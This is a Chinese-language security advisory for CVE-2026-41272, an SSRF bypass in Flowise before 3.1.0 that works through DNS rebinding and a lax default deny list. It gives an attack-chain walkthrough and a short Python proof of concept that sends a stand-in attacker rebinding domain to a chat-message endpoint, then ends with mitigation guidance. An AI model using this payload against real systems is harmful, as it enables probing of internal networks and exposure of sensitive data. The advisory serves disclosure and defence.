CVE-2026-41272 CVSS 7.1 高危

CVE-2026-41272 Flowise SSRF漏洞

披露日期: 2026-04-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41272

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Flowise

漏洞概述

Flowise 是一个用于构建大语言模型流程的 UI 工具。在 3.1.0 版本之前，其核心安全封装器存在逻辑缺陷。攻击者可通过 DNS 重绑定或利用默认配置绕过 SSRF 防护，访问受限资源。该漏洞已在 3.1.0 中修复。

技术细节

该漏洞源于 Flowise 用于防止 SSRF 的 `secureAxiosRequest` 和 `secureFetch` 封装器存在实现缺陷。攻击者可利用 DNS 重绑定（TOCTOU）绕过检查：在初次 DNS 解析时返回合法 IP 以通过校验，随后在请求发起时将解析切换为内网 IP（如 127.0.0.1）。此外，默认配置未强制执行拒绝列表，进一步降低了攻击门槛。成功利用可导致内网端口探测或敏感数据泄露。

攻击链分析

STEP 1

1. 侦察

识别运行 Flowise 且版本低于 3.1.0 的目标实例。

STEP 2

2. 准备攻击

准备支持 DNS 重绑定的恶意域名，配置 DNS 记录使其在首次解析时指向允许的外网 IP，随后解析指向内网 IP (如 127.0.0.1)。

STEP 3

3. 发起请求

向 Flowise 接口发送包含恶意域名的请求，触发后端的 SSRF 封装器。

STEP 4

4. 绕过检测

利用 TOCTOU 竞态条件，使安全检查阶段看到合法 IP，而实际请求阶段访问内网资源。

STEP 5

5. 达成效果

成功扫描内网端口或访问内部服务，获取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_ssrf(target_url):
    """
    PoC for CVE-2026-41272: Flowise SSRF via DNS Rebinding
    This script demonstrates sending a request that attempts to bypass SSRF checks.
    """
    # The vulnerable endpoint usually accepts a URL parameter
    url = f"{target_url}/api/v1/chat-message" # Example endpoint
    
    # Attacker controlled domain that supports DNS Rebinding
    # 1. Resolves to safe IP initially
    # 2. Rebinds to 127.0.0.1 upon second request
    malicious_domain = "http://attacker-controlled-dns-rebind.com"
    
    payload = {
        "question": "test",
        "overrideConfig": {
            "url": malicious_domain
        }
    }
    
    try:
        response = requests.post(url, json=payload)
        print(f"Status Code: {response.status_code}")
        print(f"Response: {response.text}")
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    exploit_ssrf("http://localhost:3000")

影响范围

Flowise < 3.1.0

防御指南

临时缓解措施

建议立即升级到修复版本。若无法升级，应严格限制 Flowise 容器或主机的网络出站权限，阻断其对内网 IP 段（如 127.0.0.0/8, 10.0.0.0/8 等）的访问，并监控异常的 DNS 查询行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表